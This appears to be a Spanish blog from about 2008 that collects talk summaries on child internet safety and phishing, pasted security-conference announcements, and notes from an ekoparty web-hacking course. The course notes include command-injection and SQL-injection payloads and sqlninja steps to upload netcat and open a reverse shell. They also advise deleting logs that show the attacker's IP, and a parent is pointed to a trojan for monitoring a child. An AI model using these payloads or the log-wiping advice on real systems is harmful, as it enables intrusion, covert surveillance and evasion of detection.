seguridad informática, materia obligatoria
planes de estudio de Bolonia

con Justo Carracedo, crean las cátedras
RECSI, Salamanca
del recsi, resúmenes de algunas charlas que hizo chema
ULL, Universidad de Laguna
Dra Pino Caballero

Habló mucho, y claro, de criptored, su hija
2 revistas
la SIC
y la de Red Seguridad, que están hace muchos años

Arturo Ribagorda, un equipo de  investigación de 22 personas de las cuales 19 son doctores

la parte de gestion es mas fácil. Esto es lo que se agrega ahora a las carreras, lo que se ve en CISSP, CISSM, etc
Me vuelvo a preparar para rendirlo? ummmm, me está dando ganas de nuevo....

Mostró la situación en las universidades, que es donde él se mueve
ahora y hace 10 años
el mapa
y creció un montón la cátedra de seguridad informática, antes solo había 37 en toda España
y ahora no hicieron la estadística completa, pero cree, más de 100

En diciembre presenta su software de detección de Copy/paste de software creó
le pregunté por las páginas de pedofilia que encuentro, donde lo denuncio

lastima no se pudo hacer el tet-a-tet chema-luciano, organizado por pequeño Buda
y chema a colombia lo invitaron

Ardita, asi que ya están en España, Barcelona
gente de arcert, el equipo completo, y me dijo gastón, vos que estás en todo, no queres participar de la semana de la seguridad informatica

Hoy, sí, era el día indicado  para la charla preparada
menos mal, porque levantarse a las 5 de la mañana es terrible!!!

Como la otra vez, nos encontramos en el bar de la esquina de la escuela.

Fuimos al salón de actos, muy lindo y grande, otras veces, en una sala de reuniones es más íntimo y la gente entra más en confianza
Había 10 personas mas o menos, pocos
pero no importa, vale igual
Al principio cuando Ariel nos presentó y se presentó el como miembro de la comunidad de la escuela, dijo que esto era una muestra justamente de lo que ibamos a hablar
igualmente, es muy dificil coincidir un horario que todos puedan :-(
La charla se estimaba en 1 hora, pero duró entre 1:30 y 2 horas
Lo principal era que hagan todas las preguntas que quieran y que interrumpieran en cualquier momento, esa es la consigna, para que la aprovechen bien ;-)

La primer parte de la charla era hablar de seguridad en general
algo básico
Ezequiel primero nombró ISSA, de la que me siento parte, aunque formalmente no sea....
vino Ro, también
Habló de la seguridad informática, la seguridad de la información, generalidades
spam, cadenas de mails, que no contesten, phishing
y acá se detuvo un rato
y mostró una página de ejemplo
Ariel contó un caso real de su trabajo
y ahora el phishing no es por clickear en una url que te llega por mail,
sino que te lo mandan por virus, un troyano
como de fácil es hacer una página web igual a la del banco, un diseñador la puede hacer y uno que no sea diseñador, también ;-)
Promedio a nivel mundial aparecen aproximadamente una 400 paginas nuevas por día que intentan explotar el Phishing, las mismas van desde bancos hasta sitios de subastas

y les mostró que haciendo click en el candadito, se ve si coincide la url del certificado con la de la pag web
muy divertida la historia de ataque defensa, de e-banking, es así:
poner la clave, 2 claves, por phishing te la sacan
si no es por phishing y alguien te está mirando la conexión, puede ver lo que pasa por ahi
pusieron los teclados virtuales para que no me capturen la clave por keylogger
el keylogger captura lo que entra por teclado
con el teclado virtual, yo pongo mi clave clickeando con el mouse, no con teclado, tonces no me la capturan
pero entonces
sacaban una foto de la pantalla
despues hicieron los teclados flotantes, o sea, se mueven por la pantalla
para que los lugares donde clickea sean distintos
y tambien, sacaban foto de la pantalla
entonces cambiaron el orden de los 9 números del teclado  numérico
y lo mismo
despues cambiaron el orden y el que clickeaba se tapaba
pero, muy fácil, se fijan los 8 números restantes y ya saben qué clickeó
;-)
igual usamos home banking, compramos por los sitios de subastas online, etc
pero con cuidado!
;-)
repito
revisar el candadito, el certificado y la url que sea https

un ejempo de phishing, que ya lo utilicé allá por setiembre del 2006
aca se ve esto:
haciendo click en el candadito, se ve si coincide la url del certificado con la de la pag web.
Los navegadores avisan cuando el certificado no es seguro, pero muchas veces no le hacemos caso
y clickeamos igual
y ahi, listo

Cuando se pone las claves
esa parte, ahí, la clave va cifrada, pero otras partes de la página no
preg: yo uso home banking, y después que me validé con mi usuario, me aparecen carteles del navegador
rta: y eso es porque, la pagina del banco tiene links a otras paginas, de imágenes, por ejemplo de tarjetas de crédito
eso lo tienen que arreglar los bancos, pero no importa, ahi no hay https

vishing, lo mismo, te engañan por telefono,
"Buenos días, si es por cambio de clave, presione 2, ahora ponga su clave, al finalizar la tecla numeral...", y asi
los bancos no te van a llamar por eso, un mail tampoco, si es algo grave
smshing
se habló que son los mismos delitos que antes, lo mismo que digo siempre en este blog, no son delitos informáticos
son delitos "hechos" con la informática, con la tecnología
antes llamaban por telefono, los engaños eran por telefono, o en la calle
nustros padres nos decían "no hables con extraños", "no te subas a ningún auto"
y así ya entramos en otra parte de la charla
ahora  se con extraños
o se habla con conocidos que, a veces son amigos, a veces son reales, pero a veces son mentirosos, gente que se hace pasar por otra, simula
ojo, esto no está mal, actuar, jugar, pero saberlo
quiza la ingenuidad de algunas chicas haga que se crean ciertas cosas y hasta se enamoren virtualmente (porque no conocen realmente a la otra persona), y hasta se llegue a cosas desagradables, y hasta límites

en esta parte de la charla, ya entrando en padres, la info para padres

se mostró un resumen de las diferentes 3 generaciones

- la de la posguerra, baby boom digamos los nacidos entre 1946 y 1964
- la generación X, la nuestra, los nacidos entre 1960 80, actitudes adolescentes, rebeldes, los hippies, california jam, la sicodelia, las primeras drogas en comunidad, los chetos, los punks, el indie, Nirvana, las primeras computadoras, atari...
- y la generación Y, la de nuestros chicos del 80 hasta 2005, maso, quiza 2008, que viven la explosión de la tecnología, familias separadas, menos controles, y lo que conlleva

se habló de los chats,
de redes sociales,
fotologs,
twitter, que es una mezcla de sms y red social, donde todo el tiempo decis lo que estás haciendo

Y afuera ya se usa gps para saber donde están tus amigos
ya va llegar a la argentina, el gps, sí, el gps que se usa en los autos para ubicarte en una calle, ese me va mostrando donde están mis amigos, cada uno en ese momento!


las madres dijeron, que las hijas hablan por msn, y se preguntan cuantos contactos tienen online
la competencia de ver cual tiene mas
eso lo vemos, cuantos contactos tenes en linkedin? en orkut? en facebook?

lo que leemos en blogs, o noticias de facebook, a ver quien tiene más amigos, quien es la más popular
se mostraron noticias en la diapos, la de facebook, el hombre que mató a la mujer porque se puso soltera en su perfil
otras noticias relacionadas a facebook
Se buscan espías en facebook
Mata a su mujer, por decir que era soltera en facebook
Acepta desconocidos en las redes sociales?

otra de orkut o flickr, creo que la niña del chocolate, la puso la madre con otro texto, obvio
Acá se explica la historia de la foto que está a la derecha
y ya no se puede sacar
La madre está luchando hace años, pero cuando subis una foto a algun lado, se replica y se replica

Y se mostró el video de como una imagen te puede arruinar

cumbio, la fotologgera más popular del país

ahi les mostré  la noticia que salió en el clarín del lunes
del grooming
http://www.clarin.com/diario/2008/10/27/sociedad/s-01789753.htm
el ciberacoso sexual, a menores
el 14% de los chicos entre 9 y 18 años sufrieron una experiencia desagradable

vino Isaac, lástima llegó tarde, se perdió cosas muy interesantes

se mostró por rango etario y por sexo, lo que más usan los chicos
por ejemplo, los varones entre 10 y 15 años, usan más los juegos online, que las chicas de la misma edad

cuando son chicos , lo mejor es que la compu esté en un lugar de paso, donde uno puede ver, controlar
y bue, somos policías de nuestros chicos :-(
ya cuando son más grandes, la tienen en su habitación, o con las notebooks, que ahora están más accesibles, ellos tienen, y es más dificil controlarlos

el auto, sirve para llevarnos, y también puede atropellar a alguien, y matar
o sea, sirve para cosas buenas, y para cosas malas
internet es lo mismo
sirve para cosas buenas y para cosas malas, todo depende del uso que le da cada uno

Otros delitos o agresiones

cyberbullying

stalking

pedofilia

robos, secuestros virtuales y reales, por datos brindados en chats, en fotologs
se muestran fotos de casas, vacaciones, viajes, se ponen nombres, a veces direcciones
se puede ver o deducir poder adquisitivo...
Hay programas que filtran, por ejemplo, si en el chat, escribe la dirección o teléfono de mi casa, eso no salga, aparezca en blanco
Hay otros programas de filtros, de contenidos, etc, etc

Juegos:
second life
donde algo virtual tiene valor real
se roban casas, porque se venden afuera
es terrible
hay marcas importantes, por ejemplo IBM, hizo un paro en Second Life, con pancartas at door
hay personas famosas
hay bandas que presentan su disco ahí

lineage, otro juego
y hay phishing de juegos, orque las cosas toman mucho valor

Bajar musica, los chicos de ahora, no entienden porque voy a comprar un cd a Musimundo que vale $40, si lo consigo a $5 o gratis
Eze dijo, antes lo que hacíamos era que un amigo lo compre y yo me lo grababa con el doble cassettera

Otros padres dijeron que después de ver algún chat de su hija, no quiso ver más nada
chats eróticos, cybersexo y cosas del estilo

se habló de afip, gente que aparece ahi
robo de identidad
robo de dni, cédula, hacerse pasar por otro y sacar un crédito
Es muy fácil falsificar un dni, o conseguirlo en blanco.
Alguna persona de allí, contó que alguien que conoce, tiene 2, el verdadero y uno que dice que es mayor de edad, para poder entrar a los boliches!
:-(
chicos que tienen acceso a esto?

preg: como hacía para ver el historial de navegación de su hijo
había aprendido a mirar el historial, pero como el hijo tiene su usuario, entonces necesita la contraseña para entrar a la compu, la madre no puede entrar a verlo
preguntó coomo se hace para poder entrar igual
y sí, hay programas, pero son muy técnicos, para instalar
un troyanito
otra solución es restringirle, como por ejemplo, que no le ponga clave, si no tiene nada que ocultar no le ponga clave
pero es dificil seguro tienen cosas que ocultar, cosas íntimas, que les dan vergüenza
es lógico, por eso depende de cada familia, cada padre
yo cuando era chica, adolescente y me llamaba algun novio por teléfono, no quería hablar delante de mi viejo, me iba a la pieza, le decia "llamame más tarde", etc, etc
es lógico que quieran su intimidad y está bien
pero hay que hablarles, guiarlos
ser una guía, un patrón, no meternos en todo....
:-)
La presentación, por ahora, se puede bajar de aqui

Hasta la próxima

Para adolescentes
Pero están citados los padres y los docentes
que los acompañan en sus días

El problema principal es que los chicos chatean con mucha gente
con cualquiera
con cualquiera que puede falsificar su identidad
y les dan datos...
reales
a personas que pueden ser delincuentes

Muchos padres, escuchamos, que dicen:
"Estoy tranquilo, mi hijo está en casa, con la computadora, con internet"
y justamente, puede estar hablando con cualquier persona, de ciudades lejanas, cercanas, conocida, desconocida, inocente, todo lo contrario y/o que no sabemos qué busca
hay de todo
internet nos seduce a todos!

que suben sus fotos y las comparten con todos
dando lugar a otros delitos

que abren mails y ejecutables de cualquier lado y persona

esos peligros
esos miedos que tienen los padres, por sus hijos, que es lo principal!!
y tambien por la seguridad de la familia, de la casa, de los bienes, de las cuentas, etc, etc
todo lo que cada uno considere de valor y lo mida con su debida y ponderada regla...

Se estima 1 hora la duración de la charla, excepto que se extienda con preguntas, que serán muy bienvenidas
a ver qué interesa saber
Luego, les subiré una encuesta que hizo/organizó Ariel por chat
y más material,
gracias Ezequiel Sallis, que será quien cantará un rato y nos trae más material!
:-)


Fecha: miércoles 22 a la mañana, 7:45 hs
Lugar
Escuela María Auxiliadora de San Isidro
calle Martín y Omar 287
San Isidro

Miren la nota que salió sobre Facebook, hoy en el diario perfil
Grande Bea y Via Libre!

Bueno, ya pasó el 1º día
un mundo de gente registrándose para los TRAININGS......
iban entrando de  a poco a las aulas
Al final para el de Leo, el de Network Security Combat, se agregó un plasma, para que vean los de la 2º aula
:-)

Yo estuve,
de a ratos, en el de Andrés Riancho, de Cybsec, bien, me sirvió igual aunque no lo escuché completo

Descubrimiento y Explotación de Vulnerabilidades Web
le estoy haciendo propaganda en mi trabajo, para que lo venga a dar acá
sería muy bueno, interesante

empezó un poco más tarde, por un problema en la maquina virtual, pero después como tiro

El 1 º dia me perdí varias cosas
Se probaron varias herramientas:
Burp, para cambiar parámetros de un formulario

pero importante, o que me sirve, y me encanta
:-)
vulnerabilidades para php:
allow_url_fopen---------lee
allow_url_include------ejecuta
esto está en el /etc/php.ini
o sea, ponerlos en Off
también
safe_mode = Off  para que no llame a system
display_errors = Off


 Las comillas mágicas (o "Magic Quotes") se refieren a un proceso que automáticamente escapa datos de entrada en los scripts de PHP. Es recomendable escribir código con las comillas mágicas deshabilitadas, y en su lugar escapar los datos en tiempo de ejecución, a medida que se necesite.
para más info ver acá
Ejemplo:
a.php?id=abc'
magic_quotes_g pc = On
echo $id;
y muestra abc\'
mmmmm, igual podemos hacer SQLinjection, sin usar comilla o apóstrofe.........

register_globals
permitía sobreescribir una variable que está en el query string
When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms

ya voy a poner lo que vi
hoy, el 2º día lo viví más
llegué para

beEF
inyecta javascript

How do you search for new bugs? How do you develop new attacks?

beEF es un browser exploitation framework
ideal para probar XSS en tiempo real

Interception proxies are a must when developing web attacks. The Odysseus and Burp proxies allow a lot of control over HTTP communication. Increasingly, I am finding the need for generic network proxies like Echo Mirage that hook into network function calls.

Another tool which I couldn't do without is netcat. It is simple and powerful - a great combination.

cambia el contenido de la pag, a los usuarios que infectó con el troyano
ya no toma control solo del browser, sino tambien de su maq

CSRF, Cross-site_request_forgery
forzar al usuario a navegar por un lugar determinado
hay que tener mucha suerte como atacante para lograrlo
ej como el del caso anterior, navegar en un foro, poner un comentario, por ej en un blog.....
al estar logueado en el sitio de los libros, a la vez estar logueado en el foro, o en el sitio del banco

Los nombres de dominio
si puedo controlar el inverse lookup
ejemplo.com.ar lo registre
tengo un subdominiio
y apunta a mi ip
o sea, validar todo

query string y postdata son los vectores ppales de ataque, pero estos a veces tambien se encuentra


web2.0
agrega un método distinto de hacer los request

hago un html request y modifico con js una sección de la pag
los programadores piensan que no se puede hackear

JSON con inyecc SQL

feeds de rss
es un XML
que puede pasar?  ver gráfico en cuaderno

OS Commanding
cacti, es como un mrtg, tuvo esta vulnerabilidad
permite ejecutar comandos del so, de forma trivial

ej, el programador, hizo este script que se llama c
$cmd= 'ls' . $directorio;
system($cmd);
y directorio esta controlado por mi
tonces lo ejecuta, muestra el contenido del directorio

c.php?dir=/tmp;rm /tmp
hay un parámetro, que el programador lo usa sin sanitizarlo para una llamada al so

en cacti, lo usaban como valor de un parametro, algo asi
ejecutaban rrddtool --size $uc
y el atacante controlaba uc
atras podia poner mas comandos
rrddtool --size $uc;||&&

ultimo ej
con ping localhost
o cmd=sleep 6
o hacer un loop de 100 mil ls
while (100000000) do; /usr/bin/ls

cmd= algo;
bug del ejercicio

sqlinjection
ms sqlserver, es una de las mas comunes y de las mas fáciles de explotar
Me vino re bien, justamente no sé nada de SQLserver
ya sé que SQLserver 2000 es más fácil de vulnerar que SQL2005

eludiendo logins
username=' 'or 1=1--'
-- comenta
1º comilla del progr, y la 2º la pongo yo, tonces devuelve vacío, y como lo que sigue es verdad me devuelve toda la tabla

zoom en ubuntu.......

sqlninja, permite escalar privlegios
aunque este deshabilitado el xp_cmdshell, lo re habilita ;-)

permite ejecutar, abrir una conex remota, diapo 33
tengo que ser user privilegiado en la db y permisos de salida en el fw
otra
si la aplicac web se conecta al server de db, con user pepe, puedo reconectarme a localhost openrowset y ejecute cmdshell

el usuario sa en ms no tiene contraseña
con pepe no puedo ejecutar cmdshell
pero pepe tiene que tener permiso de openrowset, es comun


escanear la red interna
y segun cuanto tarde y el error que devuelva, puedo ver que ports tiene abiertos
diapo 33

muchos filtros que se ven en la realidad buscan una comilla, y si hay, muestra un error de sintaxis inválida
esto es incorrecto, puedo no usar una comilla prra inyectar, ver diapo 36
poner la comilla en hexa ;-)
validar es mejor
qué frase!!!!
si necesito aceptar cualquier cosa, ejemplo el gerente se llama o`connor
debo escapear las comillas
cuando el input tiene '
poner \'

select * from users where nombre='o\'connor'

en MySQL
elimina comentarios, parser inicial
sel/**/ect
por eso no hay que buscarlo para validar, igual input diapo 37

web applications firewall, es como sistema de deteccion de intrusos para web
hace maso 5 años que existen

Blind SQLinjection
puede que no se vea, y el error que tira, es comun, reintente de nuevo...
cómo me doy cuenta que funciona la inyeccion?
por ej con time delays
o con inyecciones blind, asi
'and 1=1--
'and 1=2--

da resultados distintos, aunque no nos muestre el error

si no muestra pag distintas, asi, hacerlo por tiempo, con waitfor delay

sqlninja
conviene borrar el conf, y corerlo, se crea solo, preguntando
sqlninja -m t
sqlninja -m u -v -d 1 que suba el nc (netcat), y vea los echos y nc.scr
echo e
e es un comando para debug, y genera el binario
no es el echo el genera el binario, sino el debug (no sabe bien por que, buscar)
ns.scr lo traduce a nc.exe

sqlninja no tiene en cuenta que todos esten hackeando el mismo server, y todos a la vez podemos estar escribiendo el nc.scr

cuando termine el netcat, ahi se conectará a la maq propia y levantará una consola de so

cada una de estas consultas que está haciendo, genera un log, en el apache o en el iis

borrar el archivo de logs, para seguridad....
al hacer un pen test no importa, que quede y el cliente lo vea

si es un hack, borra los logs que tengan tu ip, tu nombre de usuario
si borras todo es peor...hay herramientas que lo hacen, un script con un grep

sqlninja hace un openrowset y un forcebrute

terminó, subio el archivo
ahora veamos si hace la conex del server a mi maq
./sqlninja -m r -v -d 1
r reverse
obtuvo la consola con system

set
net user /add pepe
para probar sql2000, y me deja crear el user, o sea, soy system o admin

Las cookies, las genera la aplicación, el lenguaje de programación
aplicaciones que no borran cookies y solo va a la home page, le doy logout y no hacen cookie.destroy. solo va a la pag de inicio
Ver este ejemplo, no borra la cookie, sino el contenido
Recordemos con XSS le podemos robar la cookie al usuario, está en todos lados, hasta en wikipedia
;-)

mod security
filtra en base a firmas, es como firmas para web
tiene un lenguaje de reglas
Ristic cambia la forma en como se hace la seg web, porque propone en vez de web app fw, que filtre por black list, que sea por white list
hacer un patron
filtra esaas reglas con mod_security y si no pasa, la corta
mod_profiler, tambien, la aplicacion que genera el perfil para seguridad positiva

honeynet project

Habló mucho de Iván Ristic que bueno
va a modificar toda la seguridad web, tendencia, con la "seguridad positiva"

conferencia de OWASP de NY, tampoco zerodays
La amenaza, denominada Clickjaking (secuestro de clic), se iba a
presentar en la conferencia OWASP, pero a pedido de Adobe y otros
proveedores afectados, la charla ha sido pospuesta hasta que se
solucionen las vulnerabilidades descubiertas en los navegadores.

todo esto es un borrador de la clase, falta corregir, pasarlo en limpio.....

The DeepSec In Depth Security Conference is happy to announce the preliminary
schedule for this year's event from November 11th to 14th in Vienna, Austria.

The schedule which can be found at https://depsec.net/schedule offers bleeding
edge talks from international speakers on topics including botnet analysis, web
application security, malware detection, legal and administrative issues, secure
coding and code review, hardware an firmware attacks, and more.

Registration is open at: https://deepsec.net/register/

In addition to the two day conference we offer two days of in-depth workshops on
selected topics:

‣ Improving Code with Destructive Data (Heikki Kortti and Jukka Taimisto)
‣ Security Audit and Hardening of Java based Software (Marc Schoenefeld)
‣ The Exploit Laboratory (Saumil Udayan Shah)
‣ Design and Implementation of Security Awareness Campaigns (Stefan Schumacher)
‣ Advanced Malware Deobfuscation (Scott Lambert)
‣ Protocol and Traffic Analysis for Snort Signature (Matt Jonkman)
‣ Secure Application Coding for Enterprise Software (Vimal Patel)

List of speakers with presentations:

‣ Achim Reckeweg ; Sun Microsystems ; Germany
‣ Alex Stamos ; iSEC Partners ; USA
‣ Alexander Kornbrust ; Red Database Security GmbH ; Germany
‣ Andrea Monti ; Studio Legale Monti ; Italy
‣ Arrigo Triulzi ; Independent Security Consultant ; Italy
‣ Chema Alonso, José Parada ; Informática 64 ; Spain
‣ Daniel Mende, Simon Rich ; ERNW GmbH ; Germany, vienen a la ekoparty!
‣ Dr. Anton Chuvakin ; LogLogic, Inc ; USA
‣ Haroon Meer ; SensePost ; South Africa
‣ Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
‣ Jason Steer ; IronPort, a division of Cisco Systems ; UK
‣ Joe Stewart ; SecureWorks ; USA
‣ José Nazario ; Arbor Networks ; USA
‣ Kurt Grutzmacher ; Pacific Gas & Electric ; USA
‣ Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina (va a estar en ekoparty)
‣ Marc Schoenefeld ; University of Bamberg ; Germany
‣ Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA
‣ Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand
‣ Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA
‣ Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy
‣ Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria
‣ Rafael Dominguez Vega ; MWR InfoSecurity ; UK
‣ Saumil Udayan Shah ; CEO, Net-Square ; India (va a estar en BA-CON)
‣ Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA
‣ Sharon Conheady ; Ernst & Young ; UK
‣ Shreeraj Shah ; Blueinfy Solutions ; India
‣ Simon Roses Femerling ; Microsoft ; Spain
‣ Stefan Schumacher ; Kaishakunin.com ; Germany
‣ Stefano Zanero ; Politecnico di Milano TU
‣ Claudio Criscione ; SecureNetwork Srl ; Italy
‣ VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India
‣ Vincenzo Iozzo ; Secure Network ; Italy
‣ Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan
‣ Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom
‣ fukami ; SektionEins GmbH ; Germany


DeepSec Organisation Team.
https://deepsec.net/contact

Bueno, le hago propaganda a OWASP, algunos ya saben por qué
;-)
AHora, lástima que faltan algunos datos, sobre las charlas, LU, ya me imagino de qué va tu charla ;-)
pero CHEMA y PARADA....tienen varias.....será LDAPinjection?? para interactuar con OWASP??
;-)

La ekoparty es una conferencia eminentemente técnica, de seguridad, contraseguridad y cosas del estilo.....
;-)

se hace los días 2 y 3 de octubre en el Centro Cultural Borges

Se cerró el call for papers, y quedaron los siguientes speakers

 

Entrar en la pag web para ver un resumen de las charlas alli tambien, en archivos, estan las charlas de la edicion anterior, para ver el nivel de las charlas

También hay trainings, cursos los dias anteriores  

ekoparty security trainings (2008)
Título del Curso	Instructor	Anticipado: (Agosto 31)	Regular: (Septiembre 22)	Duración
Descubrimiento y Explotación de Vulnerabilidades Web	Andrés Riancho, CYBSEC	1600$	2100$	2 Días
Unethical Hacking (Version sintetizada)	Pablo Solé, IMMUNITY	1000$	1500$	1 Día
Stack Overflows	Damian Gomez, IMMUNITY	1000$	1500$	1 Día
Hacking and Defending Oracle Databases	Esteban Martínez Fayó, ARGENISS	1600$	2100$	2 Días
Network Security COMBAT Training	Leonardo Pigñer	1600$	2100$	2 Días

Otras actividades

Wargames
En esta edición jugaremos a Packetwars
El objetivo del juego es penetrar un sistema preparado específicamente para ello. También hay premios para esto.

Wardrive
Saldremos con un vehículo por la ciudad de Buenos Aires para descubrir enlaces WiFi y tratar de crear un mapa mostrando los accesos que hay.
Quienes participan deberían traer sus notebooks o equipos con el sofware necesario (y hardware).
De todas maneras quienes no lo traigan pueden disfrutarlo como un paseo turístico y conocer un poco más de nuestra amada ciudad.

Aftercon party
La noche del último dia de conferencia hacemos una fiesta :)
No hay mucho que explicar.


ah, y la noche anterior también, un aftercon en un pub, con cerveza libre.....

Slogan ganador ekoparty

1er: "Vi root y entre" (Vampii)

Hablando de la eko, ya está re re confirmado hace días PacketWars

Los trainings en Proydesa
y más charlas o speakers que estuvieron en defcon y BH!!!!

Ver la pag web http://www.ekoparty.com.ar


Otras cosas importantes, que me he enterado buscando por ahí.......

http://recon.cx/2008/
En Montreal, la de este año ya pasó, junio. Estuvo Alex Sotirov, que viene a la eko
http://determina.blogspot.com/
un blog de researches, ahi participa Alex Sotirov....
dale cancelar 2 veces al login y entra...

http://www.whitewolfsecurity.com/ice2.php
Ice II, en Las vegas, octubre 1,2 y 3 los días de la eko
Vean en esa pag, en News, esto
CFP for the IT Revolutions conference, December 17th - 19th in Venice, IT released
Terrible, en Italia, y de IT general, buenisimo.....abierto el cfp



como hacen esto?
esta es la herramienta que yo quiero
http://www.room362.com/archives/217-DEFCON-16-The-Tools-not-the-Toools.html
que avise cuando un blog te nombra
Ya le voy a preguntar a Robert, el dueño del blog que hace resumenes de defcon, de zeroday, etc, etc, interesante, saca la noticia real y la comenta, amplía.....
en realidad es editor invitado  :-)

lo que quiero hacer yo
;-)

Ya se publicó en la pag de BA-Con las charlas, speakers, dojos

Y salió en varias listas, entre otras.....

la de full-disclosure, que me suscribí hace poco
y decía esto que pego abajo

NOTA: lean el último párrafo....
;-)
por si no lo encuentran, dice esto:

We would like to especially thank the gracious sponsorship of Core, 
Microsoft, and Symantec/SecurityFocus, without whom this event 
would not be possible and/or would be a lot more expensive for attendees.
We also suggest that conference attendees stay a couple of days
longer and go to ekoparty right after this event.

[Full-disclosure] PacSec 2008 CFP   (Deadline Sept. 1, Conference Nov. 12/13) and BA-Con 2008 Speakers (Sept. 30/  Oct. 1)PacSec 2008 CFP (Deadline Sept. 1, Conference Nov. 12/13) and BA-Con 2008 Speakers (Sept. 30/ Oct. 1)


Dragos Ruiu
dr at kyx.net Tue Aug 26 20:55:59 BST 2008

• Previous message: [Full-disclosure] [ MDVSA-2008:180-1 ] libxml2
• Next message: [Full-disclosure] [IVIZ-08-001] Microsoft Bitlocker Plain Text Password Disclosure
  

---

I would like to thank the academy, and endorsement of the Great  
Council, for placing us on their top sellout list among such esteemed  
company. But, uh just before you engrave the gold statuette, there is  
the small matter of a some mis-spellings.... so in the spirit of  
selling out...  it's....

the larch.

nope. ok.

How about a small editorial - I'm told that Argentina will be blazing  
into uncharted territory by instituting internet based voting in  
presidential elections imminently. Most people are treating this with  
remarkably little concern, IMHO. (See: http://xkcd.com/463/)  We've  
taken the liberty of inviting someone who has actually looked at some  
of these systems (Harri Hursti) in to inject some realism (:-) and  
practical experience gained from analyzing other such plans into the  
efforts as the legislation for this new system is being built. Ask  
Harri for his comparison between fraud in the financial system and  
electronic voting... :-)

--8<--kyx--8<--

Spanish url: http://ba-con.com.ar/speakers.html?language=e

Speaker list and Dojos for BA-Con, September 30, October 1st.
(all presentations in both Spanish and English)

  Presentations:

  WPA/WPA2: how long is it gonna make it - Cédric Blancher & Simon Maréchal, 
EADS & SGDN
  Security Concerns of Firmware Updates (SPI System BIOS and Embedded  
Controller) - Sun Bing
  A Practical Approach to Mitigate and Remove Malware - Ching Tim Meng
  Advances in Attacking Interpreted Languages: Javascript - Justin  
Ferguson
  Understanding eVoting in post Everest, TTBR world - Harri Hursti
  SecViz 007 - Raffael Marty, Splunk
  Pass-the-hash Toolkit for Windows - Hernan Ochoa, Core
  Linux 2.6 kernel rootkits - Daniel Palacio, Immunity
  Reverse Engineering Dynamic Languages, a Focus on Python - Aaron  
Portnoy & Ali Rizvi-Santiago, TippingPoint
  All the Crap Aircrafts Receive and Send - Hendrik Scholz
  Teflon: anti-stick for the browsers attack surface - Saumil Shah,  
Net-Square
  Hacking PXE without reboot (using the BIOS network stack for other 
purposes) - Julien Vanegue, CESAR
  LeakedOut: the Social Networks You Get Caught In - Jose Orlicki, Core

Dojos (September 28/29):
  Reverse Code Engineering - Edgar Barbosa, COSEINC
  Practical 802.11 Wi-Fi (In)Security - Cédric Blancher, EADS
  Effective Fuzzing using the Peach Fuzzing Platform (2 days) -  Michael 
Eddington, Leviathan
  Assembler for Exploits - Gerardo Richarte, Core
  The Exploit Lab - Saumil Shah, Net-Square

We would like to especially thank the gracious sponsorship of Core, 
Microsoft, and Symantec/SecurityFocus, without whom this event 
would not be possible and/or would be a lot more expensive for attendees.
We also suggest that conference attendees stay a couple of days
longer and go to ekoparty right after this event.

cheers,
--dr

--8<--kyx--8<--

 De paso nos enteremos de otras conferencias 

English url: http://pacsec.jp/speakers.html?language=en
Japanese url: http://pacsec.jp/speakers.html?language=ja
(the following should be up soon...)
Spanish url: http://pacsec.jp/speakers.html?language=es
Chinese url: http://pacsec.jp/speakers.html?language=cn

PacSec 2008 CALL FOR PAPERS

World Security Pros To Converge on Japan

    TOKYO, Japan -- To address the increasing importance of information
    security in Japan, the best known figures in the international
    security industry will get together with leading Japanese
    researchers to share best practices and technology. The most 
    significant new discoveries about computer network hack attacks 
    and defenses will be presented at the sixth annual PacSec conference.

    The PacSec meeting provides an opportunity for foreign specialists  
    to be exposed to Japanese innovation and markets and collaborate 
    on practical solutions to computer security issues. In an informal
    setting with a mixture of material bilingually translated in both
    English and Japanese the eminent technologists can socialize and
    attend training sessions.

    Announcing the opportunity to submit papers for the PacSec 2008
    network security training conference. The conference will be held
    November 12/13th in Tokyo at the Aoyama Diamond Hall above
    Omotesando station. The conference focuses on emerging
    information security tutorials - it is a bridge between the
    international and Japanese information security technology
    communities..

    Please make your paper proposal submissions before September 1st,
    2008. Slides for the papers must be submitted for translation by
    October 1, 2008.

    A some invited papers have been confirmed, but a limited number of
    speaking slots are still available. The conference is responsible
    for travel and accomodations for the speakers. If you have a 
    proposal for a tutorial session then please email a synopsis of 
    the material and your biography, papers and, speaking background 
    to secwest08 [at] pacsec.jp . Tutorials are one hour in length, but 
    with simultaneous translation should be approximately 45 minutes 
    in English, or Japanese. Only slides will be needed for the October 
    paper deadline, full text does not have to be submitted.

    The PacSec conference consists of tutorials on technical details
    about current issues, innovative techniques and best practices in the
    information security realm. The audiences are a multi-national mix
    of professionals involved on a daily basis with security work: security
    product vendors, programmers, security officers, and network
    administrators. We give preference to technical details and
    education for a technical audience.

    The conference itself is a single track series of presentations in a
    lecture theater environment. The presentations offer speakers the
    opportunity to showcase on-going research and collaborate with peers
    while educating and highlighting advancements in security products
    and techniques. The focus is on innovation, tutorials, and education
    instead of product pitches. Some commercial content is tolerated,
    but it needs to be backed up by a technical presenter - either giving 
    a valuable tutorial and best practices instruction or detailing
    significant new technology in the products.

    Paper proposals should consist of the following information:
     1. Presenter, and geographical location (country of
        origin/passport) and contact info (e-mail, postal address,
        phone, fax).
     2. Employer and/or affiliations.
     3. Brief biography, list of publications and papers.
     4. Any significant presentation and educational
        experience/background.
     5. Topic synopsis, Proposed paper title, and a one paragraph
        description.
     6. Reason why this material is innovative or significant or an
        important tutorial.
     7. Optionally, any samples of prepared material or outlines
        ready.
     8. Will you have full text available or only slides?
     9. Please list any other publications or conferences where
        this material has been or will be published/submitted.
     10. Do you have any special demo or network requirements
        for your presentation?

    Please include the plain text version of this information in
    your email as well as any file, pdf, sxw, ppt, or html
    attachments.

    Please forward the above information to secwest08 [at]
    pacsec.jp to be considered for placement on the speaker
    roster, or have your lightning talk scheduled. The deadline
    is soon for this one: September 1st 2008.


cheers,
--dr

